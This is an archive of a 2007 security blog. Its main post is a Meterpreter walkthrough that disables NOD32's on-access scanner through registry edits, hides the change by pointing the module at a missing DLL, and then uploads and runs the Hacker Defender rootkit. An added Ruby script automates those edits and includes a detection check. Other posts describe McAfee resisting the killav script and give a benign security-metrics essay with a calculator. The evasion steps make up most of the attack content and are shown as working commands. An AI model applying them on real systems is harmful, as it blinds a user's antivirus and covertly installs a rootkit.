Friday, June 29, 2007

Defeating NOD32 AV

Ok, I am going to claim victory over NOD32, but only on a technicality. But hey, I ain't proud, I'll take it.

So if you upload any malware, NOD32, like a good AV, will give you an alert (that's good):

meterpreter > upload hxdef100.exe hxdef100.exe
[*] uploading : hxdef100.exe -> hxdef100.exe
[*] uploaded : hxdef100.exe -> hxdef100.exe
meterpreter > ls

Listing: C:\WINDOWS\help\hxdef
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir Wed Dec 31 17:00:00 MST 1969 .
40777/rwxrwxrwx 0 dir Wed Dec 31 17:00:00 MST 1969 ..

The listing right after the upload shows only . and ..: the file was caught and quarantined as soon as it landed.



NOD32 AV alerting on Hacker Defender

NOD32 restarts nod32krn.exe immediately if you kill the process (it just comes back under a new PID), which is a real bummer.

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off nod32kui.exe...
[*] Killing off nod32krn.exe...

or if you find the process with ps and kill it by PID:

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
372 smss.exe \SystemRoot\System32\smss.exe
588 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
664 services.exe C:\WINDOWS\system32\services.exe
676 lsass.exe C:\WINDOWS\system32\lsass.exe
840 svchost.exe C:\WINDOWS\system32\svchost.exe
948 svchost.exe C:\WINDOWS\System32\svchost.exe
1128 svchost.exe C:\WINDOWS\System32\svchost.exe
1152 svchost.exe C:\WINDOWS\System32\svchost.exe
1332 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1616 Explorer.EXE C:\WINDOWS\Explorer.EXE
1760 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1768 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
1852 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
1892 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1920 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
312 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
2088 nod32krn.exe C:\Program Files\Eset\nod32krn.exe

meterpreter > kill 2088
Killing: 2088

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
348 smss.exe \SystemRoot\System32\smss.exe
580 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
604 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
656 services.exe C:\WINDOWS\system32\services.exe
668 lsass.exe C:\WINDOWS\system32\lsass.exe
832 svchost.exe C:\WINDOWS\system32\svchost.exe
940 svchost.exe C:\WINDOWS\System32\svchost.exe
1116 svchost.exe C:\WINDOWS\System32\svchost.exe
1168 svchost.exe C:\WINDOWS\System32\svchost.exe
1324 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1616 Explorer.EXE C:\WINDOWS\Explorer.EXE
1724 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1736 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
1792 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
1916 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1944 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
288 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
3880 nod32krn.exe C:\Program Files\Eset\nod32krn.exe
1568 cmd.exe C:\WINDOWS\system32\cmd.exe
2404 regedit.exe C:\WINDOWS\regedit.exe


So how do we get malware on the box without alerting the user? More specifically, how do we get past AMON, NOD32's on-access file monitor?

NOD32 AV AMON file protection

I found that by editing some registry keys we can turn off the file protection.


meterpreter > reg
Usage: reg [command] [options]

Interact with the target machine's registry.

OPTIONS:

-d The data to store in the registry value.
-h Help menu.
-k The registry key path (E.g. HKLM\Software\Foo).
-t The registry value type (E.g. REG_SZ).
-v The registry value name (E.g. Stuff).

COMMANDS:

enumkey Enumerate the supplied registry key [-k <key>]
createkey Create the supplied registry key [-k <key>]
deletekey Delete the supplied registry key [-k <key>]
setval Set a registry value [-k <key> -v <value> -d <data>]
deleteval Delete the supplied registry value [-k <key> -v <value>]
queryval Queries the data contents of a value [-k <key> -v <value>]

meterpreter > reg enumkey -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings
Enumerating: HKLM\Software\eset\nod\currentversion\modules\AMON\settings\Config000\Settings

Values (23):

SP
enabled
check_on_open
check_on_rename
check_on_execute
check_on_create
quarantine_on_create
cache_enable
media_floppies
media_network
media_local
boot_on_access
boot_on_shutdown
sec_clean
sec_delete
sec_rename
sec_exclude
sec_replace
manualstop_enabled
autorun_dynamic
autoupd_notify
exc
exc_num

meterpreter > reg queryval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings -v enabled
Key: HKLM\Software\eset\nod\currentversion\modules\AMON\settings\Config000\Settings
Name: enabled
Type: REG_DWORD
Data: 1

meterpreter > reg setval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings -v enabled -d 0
Successful set enabled.

(Give -t REG_DWORD here too, the way the service change below does, so the value keeps its type instead of whatever setval defaults to.)

Next, the AMON service itself. Start type 2 is automatic; 3 is manual (demand start), so it won't come up on its own at the next boot.

meterpreter > reg queryval -k HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON -v start
Key: HKLM\SYSTEM\CurrentControlSet\Services\AMON
Name: start
Type: REG_DWORD
Data: 2

meterpreter > reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON -v start -t REG_DWORD -d "3"
Successful set start.
meterpreter > reg queryval -k HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON -v start
Key: HKLM\SYSTEM\CurrentControlSet\Services\AMON
Name: start
Type: REG_DWORD
Data: 3

But if you disable AMON this way, the tray icon turns red and AMON shows up grayed out in the AV's Control Center (that's no good).

So to prevent that, we can change the registry value that tells NOD32 which DLL to load for AMON. We point it at a library that doesn't exist; when NOD32 can't find it, it quietly loads the rest of its modules and gives the user no indication that anything is wrong. If you go looking for the AMON module you won't see it, but if you aren't looking for it you probably won't notice a problem.

meterpreter > reg queryval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON -v filename
Key: HKLM\Software\eset\nod\currentversion\modules\AMON
Name: filename
Type: REG_SZ
Data: C:\Program Files\Eset\ps_amon.dll

meterpreter > reg setval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON -v filename -t REG_SZ -d "C:\\Program Files\\Eset\\ps_amon1.dll"
Successful set filename.

meterpreter > reg queryval -k HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON -v filename
Key: HKLM\Software\eset\nod\currentversion\modules\AMON
Name: filename
Type: REG_SZ
Data: C:\Program Files\Eset\ps_amon1.dll
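The three registry changes above, done by hand one reg command at a time, are the kind of thing you want scripted so that every write is checked and can be undone. The following is an added example, not code from the original post and not a Metasploit script: it applies the same three changes, reads each one back to confirm it stuck, keeps the original values for a restore, and includes the defender-side check for the same three values. The registry is reached through two methods, query(key, name) and set(key, name, type, data), implemented here by an in-memory stand-in loaded with the values the post queried; hooking those two methods up to a real registry (for instance a Meterpreter session's registry API) is left to the caller and is an assumption of this example.

```ruby
# Added example, not from the original post or from Metasploit.
# Applies the NOD32 2.7 AMON registry changes the post walks through,
# verifying each write and keeping the originals so they can be put back.

AMON_SETTINGS = 'HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON\\settings\\Config000\\Settings'
AMON_MODULE   = 'HKLM\\Software\\eset\\nod\\currentversion\\modules\\AMON'
AMON_SERVICE  = 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\AMON'

# Windows service start types used below (SCM constants).
SERVICE_AUTO_START   = 2
SERVICE_DEMAND_START = 3

# In-memory stand-in for the target registry (assumption: a real backend
# exposes the same two methods). Values are stored as [type, data].
class FakeRegistry
  def initialize(values)
    @values = values.dup
  end

  def query(key, name)
    @values["#{key}\\#{name}"] # [type, data] or nil when absent
  end

  def set(key, name, type, data)
    @values["#{key}\\#{name}"] = [type, data]
    true
  end
end

# Constructed sample mirroring the values queried in the post.
def nod32_default_registry
  FakeRegistry.new(
    "#{AMON_SETTINGS}\\enabled" => ['REG_DWORD', 1],
    "#{AMON_SERVICE}\\start"    => ['REG_DWORD', SERVICE_AUTO_START],
    "#{AMON_MODULE}\\filename"  => ['REG_SZ', 'C:\\Program Files\\Eset\\ps_amon.dll']
  )
end

# The three changes from the post, in the order they were made. The last
# one is what keeps the tray icon from going red: NOD32 silently skips a
# module whose DLL it cannot find.
AMON_CHANGES = [
  [AMON_SETTINGS, 'enabled',  'REG_DWORD', 0],
  [AMON_SERVICE,  'start',    'REG_DWORD', SERVICE_DEMAND_START],
  [AMON_MODULE,   'filename', 'REG_SZ',    'C:\\Program Files\\Eset\\ps_amon1.dll']
]

# Applies AMON_CHANGES. Each value is read first, so an unfamiliar NOD32
# layout fails loudly instead of creating stray values, and read back
# afterwards so a write that did not stick is caught. Returns the original
# values for restore_amon.
def disable_amon(reg)
  saved = {}
  AMON_CHANGES.each do |key, name, type, data|
    orig = reg.query(key, name)
    raise "#{key}\\#{name} not present; unexpected NOD32 layout" if orig.nil?
    saved[[key, name]] = orig
    reg.set(key, name, type, data)
    raise "write to #{key}\\#{name} did not stick" unless reg.query(key, name) == [type, data]
  end
  saved
end

# Puts the saved values back and reports whether every one now matches.
def restore_amon(reg, saved)
  saved.each { |(key, name), (type, data)| reg.set(key, name, type, data) }
  saved.all? { |(key, name), orig| reg.query(key, name) == orig }
end

# Defender-side check of the same three values. Returns one finding per
# value that has been moved away from its shipped state.
def amon_tampering(reg)
  findings = []
  enabled = reg.query(AMON_SETTINGS, 'enabled')
  findings << 'AMON disabled in settings (enabled=0)' if enabled && enabled[1] == 0
  start = reg.query(AMON_SERVICE, 'start')
  if start && start[1] != SERVICE_AUTO_START
    findings << "AMON service start type is #{start[1]}, expected #{SERVICE_AUTO_START}"
  end
  fn = reg.query(AMON_MODULE, 'filename')
  if fn && File.basename(fn[1].tr('\\', '/')).casecmp('ps_amon.dll') != 0
    findings << "AMON module path points at #{fn[1]} instead of ps_amon.dll"
  end
  findings
end

if __FILE__ == $0
  reg = nod32_default_registry
  saved = disable_amon(reg)
  puts "findings after change: #{amon_tampering(reg).inspect}"
  puts "restored cleanly: #{restore_amon(reg, saved)}"
end
```

The read-before-write matters on a real box: if the key layout differs from this NOD32 version, setval would happily create a value that does nothing, and you would think AMON was off when it wasn't. The tampering check is the same three comparisons from the other side, and runs just as well over an exported .reg file.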



meterpreter > upload hxdef100.exe hxdef100.exe
[*] uploading : hxdef100.exe -> hxdef100.exe
[*] uploaded : hxdef100.exe -> hxdef100.exe
meterpreter > upload hxdef100.ini hxdef100.ini
[*] uploading : hxdef100.ini -> hxdef100.ini
[*] uploaded : hxdef100.ini -> hxdef100.ini
meterpreter > execute -f hxdef100.exe
Process 204 created.

All done :-)

Sunday, June 17, 2007

Sunday Comic Fun

Linux User At BestBuy...

website: http://imgs.xkcd.com/

Saturday, June 16, 2007

Antivirus and Rootkits part 2 -nod32

More on killing AV...

McAfee Enterprise 8.x was kicking my butt with the killav script, so I decided to try NOD32 version 2.7. It didn't go much better. It would at least kill the processes, but nod32krn.exe would just start back up automatically with a new PID :-(

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off nod32krn.exe...
[*] Killing off nod32kui.exe...
meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
384 smss.exe \SystemRoot\System32\smss.exe
596 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
624 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
672 services.exe C:\WINDOWS\system32\services.exe
684 lsass.exe C:\WINDOWS\system32\lsass.exe
848 svchost.exe C:\WINDOWS\system32\svchost.exe
956 svchost.exe C:\WINDOWS\System32\svchost.exe
1124 svchost.exe C:\WINDOWS\System32\svchost.exe
1148 svchost.exe C:\WINDOWS\System32\svchost.exe
1340 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1500 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1524 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
1700 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
876 Explorer.EXE C:\WINDOWS\Explorer.EXE
1264 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1272 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
324 YahooMessenger.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
1316 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
3040 nod32krn.exe C:\Program Files\Eset\nod32krn.exe

meterpreter > kill 3040
Killing: 3040
meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
384 smss.exe \SystemRoot\System32\smss.exe
596 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
624 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
672 services.exe C:\WINDOWS\system32\services.exe
684 lsass.exe C:\WINDOWS\system32\lsass.exe
848 svchost.exe C:\WINDOWS\system32\svchost.exe
956 svchost.exe C:\WINDOWS\System32\svchost.exe
1124 svchost.exe C:\WINDOWS\System32\svchost.exe
1148 svchost.exe C:\WINDOWS\System32\svchost.exe
1340 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1500 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1524 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
1700 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
876 Explorer.EXE C:\WINDOWS\Explorer.EXE
1264 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1272 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
324 YahooMessenger.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
1316 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
3244 nod32krn.exe C:\Program Files\Eset\nod32krn.exe

So it kills the GUI, but the scanner is still running in the background, happily snatching up any malware you might be trying to upload. The user won't get the pop-up, but it will still be sticking the malware into quarantine. That's no good.

I'm now doing some research on changing some registry keys, but it pretty much involves rebooting the box and coming back to finish up, which isn't a viable option in my opinion.

I'll post more on it later.

-CG

Thursday, June 14, 2007

Quantifying Security using Metrics

There is a great deal of valuable data that can be gained from the penetration test element of an assessment. Knowing whether or not your perimeter, for example, is secure and validating that knowledge is important. Looking at the scope of the assessments that I have recently been working on I think most people are looking to gain more than just an initial validation of their existing security controls.

Any good penetration test or vulnerability assessment will deliver a set of results that will include a listing of vulnerabilities and assign a risk value to those vulnerabilities along with some remediation measures. Most of these assessments will use the following calculations or variants thereof: Risk = Threat x Vulnerability, or Risk = (Threat x Vulnerability) x Impact, and Annual Loss Expectancy = Single Loss Expectancy x Annualized Rate of Occurrence. These calculations, while a great means of assessing risk, are usually applied to a risk management lifecycle that is circular and repeating. This, in my opinion, creates an environment in which risk is not being managed but is really just being identified, fixed and re-identified. This creates a reactive rather than proactive environment. Also, these calculations rely on values that are hard, if not impossible, to define in all but the simplest of situations or scenarios.

Let's assume that after the installation of an IDS/IPS at your perimeter, you detected hotbar/spybar spyware traffic indicating that users on managed stations had local admin rights in order to be able to install the malware. Using this information you were able to assess your current controls, determine why they had admin rights and take steps to fix it. While the product has proved its worth, it was a reactive response to an issue. Ideally, being able to define a set of metrics by which to measure the security of the hosts' configuration would allow you to better define, assess and improve the security controls you have in place. By tracking this data over time you can move towards a more proactive environment.

Using the example of Host Configuration Management I would look to achieve the following:

A Benchmark score for Workstations/Laptops/Servers. - This allows you to standardize configurations and characterize the degree of lockdown applied to the OS.

The percentage of Workstations/Laptops/Servers using the standard build image. - This allows you to measure the conformance of systems in your environment to the standard build.

The percentage of systems in compliance with the standard configuration. - This shows how many systems conform to the standard build requirements regardless of how the system was built (manual, image, etc.).

The network services ratio. - This identifies potential ingress points on the hosts. Tracking unnecessary/vulnerable services that should be disabled allows you to determine the number or percentage of systems deviating from your standard build as well as potential ingress points or vulnerable systems. This data can also be applied to your patch management processes in order to prioritize which systems require immediate patching, etc...

The percentage of systems that are remotely managed. - This would identify the systems that can be administered remotely and are subject to patch management and anti-malware controls.

The percentage of critical systems actively being monitored. - This helps identify the extent of uptime and monitoring controls in place.

The number/percentage of systems logging events remotely. - This determines how many systems are forwarding security event data to a central log server.

The number/percentage of systems using an NTP server for time synchronization. - This and the previous two metrics are important for incident handling and response. When an incident occurs and the event information needs to be accessed, having this data in a central location ensures access to and integrity of those events. Time synchronization is important when reconstructing a sequence of events in the correct order.

The response time to (re)configure a system in an emergency. -This tracks the response time to reconfigure a set of systems in event of a zero-day attack or incident. This should ideally be organized by OS, Department, location.

Having a set of metrics that are easy to gather, repeatable, can be expressed as a number or percentage and are relevant to your environment, will help with analysis and allow you to become far more proactive.
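To make the host configuration metrics above concrete, here is an added example (not from the original post) that computes them from an inventory of host records, the sort of data a configuration-management or vulnerability-scanner export would give you. The record fields, the per-role list of services the standard build is expected to expose, and the sample hosts are all assumptions made for this example; the "network services ratio" is interpreted here as unexpected listening services per host, alongside the share of hosts deviating from the build.

```ruby
require 'set'

# Added example, not from the original post. Computes the host
# configuration metrics from an inventory of constructed host records.

# Listening ports the standard build is expected to expose, by role (assumption).
STANDARD_SERVICES = {
  'workstation' => Set[135, 445],
  'server'      => Set[135, 445, 3389]
}

# Constructed sample inventory (field names are assumptions for the example).
SAMPLE_HOSTS = [
  { name: 'ws01',  role: 'workstation', image: 'std-ws-1.2',  compliant: true,
    listening: [135, 445],           remote_managed: true,  remote_logging: true,
    ntp: true,  critical: false, monitored: false },
  { name: 'ws02',  role: 'workstation', image: 'manual',      compliant: true,
    listening: [135, 445, 5800],     remote_managed: true,  remote_logging: false,
    ntp: true,  critical: false, monitored: false },
  { name: 'ws03',  role: 'workstation', image: 'std-ws-1.2',  compliant: false,
    listening: [135, 445, 1433],     remote_managed: false, remote_logging: false,
    ntp: false, critical: false, monitored: false },
  { name: 'srv01', role: 'server',      image: 'std-srv-2.0', compliant: true,
    listening: [135, 445, 3389],     remote_managed: true,  remote_logging: true,
    ntp: true,  critical: true,  monitored: true },
  { name: 'srv02', role: 'server',      image: 'std-srv-2.0', compliant: false,
    listening: [135, 445, 3389, 21], remote_managed: true,  remote_logging: true,
    ntp: true,  critical: true,  monitored: false }
]

# Percentage rounded to one decimal; an empty population scores 0 rather than dividing by zero.
def pct(part, whole)
  whole.zero? ? 0.0 : (100.0 * part / whole).round(1)
end

# Listening services that are not part of the role's standard build.
def unexpected_services(host)
  host[:listening].to_set - STANDARD_SERVICES.fetch(host[:role])
end

# The metrics from the post for the given hosts, optionally for one role only.
def host_config_metrics(hosts, role: nil)
  hosts = hosts.select { |h| h[:role] == role } if role
  n = hosts.size
  critical  = hosts.select { |h| h[:critical] }
  deviating = hosts.select { |h| !unexpected_services(h).empty? }
  {
    hosts:                  n,
    pct_standard_image:     pct(hosts.count { |h| h[:image].start_with?('std-') }, n),
    pct_compliant:          pct(hosts.count { |h| h[:compliant] }, n),
    # unexpected listening services per host (interpretation of "network services ratio")
    services_ratio:         n.zero? ? 0.0 : (hosts.sum { |h| unexpected_services(h).size }.to_f / n).round(2),
    pct_deviating:          pct(deviating.size, n),
    pct_remotely_managed:   pct(hosts.count { |h| h[:remote_managed] }, n),
    pct_critical_monitored: pct(critical.count { |h| h[:monitored] }, critical.size),
    pct_remote_logging:     pct(hosts.count { |h| h[:remote_logging] }, n),
    pct_ntp:                pct(hosts.count { |h| h[:ntp] }, n),
    # Deviating hosts that cannot be fixed remotely go to the top of the patch queue.
    patch_first:            deviating.reject { |h| h[:remote_managed] }.map { |h| h[:name] }
  }
end

if __FILE__ == $0
  host_config_metrics(SAMPLE_HOSTS).each { |k, v| puts "#{k}: #{v}" }
end
```

Run the same function once per role, department or location and keep the numbers over time; the point of the post is the trend, not any one snapshot. The patch_first list is the place where the services metric feeds patch management: hosts that both deviate from the build and cannot be reached remotely need someone at the console.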

Quantitative metrics like these can be applied to multiple areas of control, including the results of a penetration test or vulnerability assessment. Some metrics that would have immediate value would be:

Perimeter Security (Anti-virus/spam/malware, Firewalls, IDS/IPS) and Threats/Attacks (Events and Incidents).
Coverage and Control (Vuln/patch management, AV management, Host management). These determine effectiveness and success of your existing security program.
Availability and Reliability (Uptime, recovery, change control).
Application/Web application security.
Penetration Testing/Vulnerability assessments. These can provide valuable data but need to be defined by your environment. Identifying and defining issues by departments, looking at the difficulty of the exploit (remote or requires local access, etc...), assessing the impact of the vulnerability in terms of your existing security controls (defense in depth).

These are all predominantly technical in nature but the same methodology could be applied to assessing user awareness and compliance. I think that regardless of what you decide to have assessed, looking to gain valuable and repeatable metrics from results should be the outcome.

A great read on Security Metrics, and where most of the above content is from, is Andrew Jaquith's book Security Metrics. It's an excellent read and is extremely relevant in today's maturing security environments.

Cheers,
Dean

Tuesday, June 5, 2007

Antivirus and Rootkits

So I was working on an article on using the HackerDefender rootkit. Hopefully it will be published soon; I'll update on that when/if it happens. During the course of doing the demo for it I wanted to see how the Metasploit killav meterpreter script would do against McAfee. It didn't do well at all: the McAfee AV had something running that I couldn't turn off using that script or with Task Manager, but if you turned off the "on protect" you could run the script and kill the rest of the AV on the box. Of further interest, and calling for more research, is the stack overflow prevention that stopped a simple Metasploit attack cold :-( I'm gonna play and see if there are ways around that, either with encoding or if it protects against heap overflows.

Anyway, assuming they don't have the stack protection on and you can get a shell, the easiest thing may be a VNC payload where you can just disable the AV by hand (virtual hand) and then upload your rootkit to the box. That brings up the whole someone-may-see-you-doing-it issue but will still get the job done.

More to follow if the ADD doesn't kick in too bad and I get off on a different tangent.

-CG